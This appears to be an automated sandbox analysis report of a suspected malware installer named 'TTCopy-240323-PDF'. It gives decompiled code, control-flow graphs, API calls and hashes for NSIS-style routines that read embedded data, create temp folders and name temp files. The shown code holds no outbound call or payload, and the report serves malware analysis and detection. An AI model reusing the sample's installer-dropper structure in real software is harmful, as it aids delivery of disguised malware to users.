                                                                                            control_flow_graph 573 403479-4034a1 GetTickCount 574 4035d1-4035d9 call 40302e 573->574 575 4034a7-4034d2 call 4035f8 SetFilePointer 573->575 580 4035db-4035df 574->580 581 4034d7-4034e9 575->581 582 4034eb 581->582 583 4034ed-4034fb call 4035e2 581->583 582->583 586 403501-40350d 583->586 587 4035c3-4035c6 583->587 588 403513-403519 586->588 587->580 589 403544-403560 call 406bb0 588->589 590 40351b-403521 588->590 596 403562-40356a 589->596 597 4035cc 589->597 590->589 591 403523-403543 call 40302e 590->591 591->589 599 40356c-403574 call 40620a 596->599 600 40358d-403593 596->600 598 4035ce-4035cf 597->598 598->580 604 403579-40357b 599->604 600->597 601 403595-403597 600->601 601->597 603 403599-4035ac 601->603 603->581 605 4035b2-4035c1 SetFilePointer 603->605 606 4035c8-4035ca 604->606 607 40357d-403589 604->607 605->574 606->598 607->588 608 40358b 607->608 608->603
                                                                                            C-Code - Quality: 93%
                                                                                            			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40d1fc
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                                                            0x00403489
                                                                                            0x0040349c
                                                                                            0x004034a1
                                                                                            0x004035d1
                                                                                            0x004035d3
                                                                                            0x00000000
                                                                                            0x004035d9
                                                                                            0x004034ad
                                                                                            0x004034c0
                                                                                            0x004034c6
                                                                                            0x004034cc
                                                                                            0x004034d7
                                                                                            0x004034dc
                                                                                            0x004034e1
                                                                                            0x004034e9
                                                                                            0x004034eb
                                                                                            0x004034eb
                                                                                            0x004034f4
                                                                                            0x004034fb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403501
                                                                                            0x00403507
                                                                                            0x0040350d
                                                                                            0x00000000
                                                                                            0x00403513
                                                                                            0x00403519
                                                                                            0x00403539
                                                                                            0x0040353e
                                                                                            0x00403543
                                                                                            0x00403549
                                                                                            0x0040354f
                                                                                            0x00403559
                                                                                            0x00403560
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403562
                                                                                            0x00403568
                                                                                            0x0040356a
                                                                                            0x0040358d
                                                                                            0x00403593
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403595
                                                                                            0x00403597
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403599
                                                                                            0x00403599
                                                                                            0x004035ac
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004035bb
                                                                                            0x00000000
                                                                                            0x004035bb
                                                                                            0x00403574
                                                                                            0x0040357b
                                                                                            0x004035c8
                                                                                            0x004035ce
                                                                                            0x004035ce
                                                                                            0x00000000
                                                                                            0x004035ce
                                                                                            0x0040357d
                                                                                            0x00403583
                                                                                            0x00403589
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004035cc
                                                                                            0x004035cc
                                                                                            0x00000000
                                                                                            0x004035cc
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0040348D
                                                                                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,eNotification,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer$CountTick
                                                                                            • String ID: defghijklmnopqrstuvwxyz$eNotification
                                                                                            • API String ID: 1092082344-2877872591
                                                                                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 609 405b99-405be4 CreateDirectoryW 610 405be6-405be8 609->610 611 405bea-405bf7 GetLastError 609->611 612 405c11-405c13 610->612 611->612 613 405bf9-405c0d SetFileSecurityW 611->613 613->610 614 405c0f GetLastError 613->614 614->612
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                            0x00405ba4
                                                                                            0x00405ba8
                                                                                            0x00405bab
                                                                                            0x00405bb1
                                                                                            0x00405bb5
                                                                                            0x00405bb9
                                                                                            0x00405bc1
                                                                                            0x00405bc8
                                                                                            0x00405bce
                                                                                            0x00405bd5
                                                                                            0x00405bdc
                                                                                            0x00405be4
                                                                                            0x00405be6
                                                                                            0x00000000
                                                                                            0x00405be6
                                                                                            0x00405bf0
                                                                                            0x00405bf7
                                                                                            0x00405c0d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405c0f
                                                                                            0x00405c13

                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                            • GetLastError.KERNEL32 ref: 00405BF0
                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                            • GetLastError.KERNEL32 ref: 00405C0F
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 3449924974-3936084776
                                                                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                                                                                            C-Code - Quality: 100%
                                                                                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                            0x0040618d
                                                                                            0x00406193
                                                                                            0x00406194
                                                                                            0x00406194
                                                                                            0x00406199
                                                                                            0x0040619a
                                                                                            0x0040619d
                                                                                            0x004061a2
                                                                                            0x004061a5
                                                                                            0x004061af
                                                                                            0x004061bc
                                                                                            0x004061c0
                                                                                            0x004061c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cc
                                                                                            0x00000000
                                                                                            0x004061ce
                                                                                            0x004061ce
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004061A5
                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-1857211195
                                                                                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                                                                                            C-Code - Quality: 100%
                                                                                            			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\nsn33EB.tmp\\", 7); // executed
				return _t4;
			}







                                                                                            0x00403c25
                                                                                            0x00403c34
                                                                                            0x00403c37
                                                                                            0x00403c39
                                                                                            0x00403c39
                                                                                            0x00403c40
                                                                                            0x00403c48
                                                                                            0x00403c4b
                                                                                            0x00403c4d
                                                                                            0x00403c4d
                                                                                            0x00403c4d
                                                                                            0x00403c54
                                                                                            0x00403c60
                                                                                            0x00403c66

                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\, xrefs: 00403C5B
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsn33EB.tmp\
                                                                                            • API String ID: 2962429428-2142785233
                                                                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 713 403371-40337e 714 403380-403396 SetFilePointer 713->714 715 40339c-4033a5 call 403479 713->715 714->715 718 403473-403476 715->718 719 4033ab-4033be call 4061db 715->719 722 403463 719->722 723 4033c4-4033d7 call 403479 719->723 725 403465-403466 722->725 727 403471 723->727 728 4033dd-4033e0 723->728 725->718 727->718 729 4033e2-4033e5 728->729 730 40343f-403445 728->730 729->727 733 4033eb 729->733 731 403447 730->731 732 40344a-403461 ReadFile 730->732 731->732 732->722 734 403468-40346b 732->734 735 4033f0-4033fa 733->735 734->727 736 403401-403413 call 4061db 735->736 737 4033fc 735->737 736->722 740 403415-40341c call 40620a 736->740 737->736 742 403421-403423 740->742 743 403425-403437 742->743 744 40343b-40343d 742->744 743->735 745 403439 743->745 744->725 745->727
                                                                                            C-Code - Quality: 92%
                                                                                            			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                                                            0x00403375
                                                                                            0x0040337e
                                                                                            0x00403387
                                                                                            0x0040338b
                                                                                            0x00403396
                                                                                            0x00403396
                                                                                            0x0040339e
                                                                                            0x004033a5
                                                                                            0x004033b7
                                                                                            0x004033be
                                                                                            0x00403463
                                                                                            0x00403463
                                                                                            0x00000000
                                                                                            0x004033c4
                                                                                            0x004033c7
                                                                                            0x004033d3
                                                                                            0x004033d7
                                                                                            0x00403471
                                                                                            0x00403471
                                                                                            0x004033dd
                                                                                            0x004033e0
                                                                                            0x0040343f
                                                                                            0x00403445
                                                                                            0x00403447
                                                                                            0x00403447
                                                                                            0x00403459
                                                                                            0x00403461
                                                                                            0x00403468
                                                                                            0x0040346b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004033e2
                                                                                            0x004033e5
                                                                                            0x00000000
                                                                                            0x004033eb
                                                                                            0x004033f0
                                                                                            0x004033f7
                                                                                            0x004033fa
                                                                                            0x004033fc
                                                                                            0x004033fc
                                                                                            0x00403409
                                                                                            0x0040340c
                                                                                            0x00403413
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040341c
                                                                                            0x00403423
                                                                                            0x0040343b
                                                                                            0x00403465
                                                                                            0x00403465
                                                                                            0x00403425
                                                                                            0x00403425
                                                                                            0x00403428
                                                                                            0x0040342b
                                                                                            0x00403431
                                                                                            0x00403437
                                                                                            0x00000000
                                                                                            0x00403439
                                                                                            0x00000000
                                                                                            0x00403439
                                                                                            0x00403437
                                                                                            0x00000000
                                                                                            0x00403423
                                                                                            0x00000000
                                                                                            0x004033f0
                                                                                            0x004033e5
                                                                                            0x004033e0
                                                                                            0x004033d7
                                                                                            0x004033be
                                                                                            0x00403473
                                                                                            0x00403476

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID: eNotification
                                                                                            • API String ID: 973152223-3222815890
                                                                                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 746 4015c1-4015d5 call 402da6 call 405fe2 751 401631-401634 746->751 752 4015d7-4015ea call 405f64 746->752 753 401663-4022f6 call 401423 751->753 754 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 751->754 759 401604-401607 call 405c16 752->759 760 4015ec-4015ef 752->760 770 402c2a-402c39 753->770 771 40292e-402935 753->771 754->770 773 40165b-40165e 754->773 769 40160c-40160e 759->769 760->759 763 4015f1-4015f8 call 405c33 760->763 763->759 777 4015fa-4015fd call 405b99 763->777 775 401610-401615 769->775 776 401627-40162f 769->776 771->770 773->770 779 401624 775->779 780 401617-401622 GetFileAttributesW 775->780 776->751 776->752 782 401602 777->782 779->776 780->776 780->779 782->769
                                                                                            C-Code - Quality: 86%
                                                                                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                            0x004015c1
                                                                                            0x004015c9
                                                                                            0x004015cc
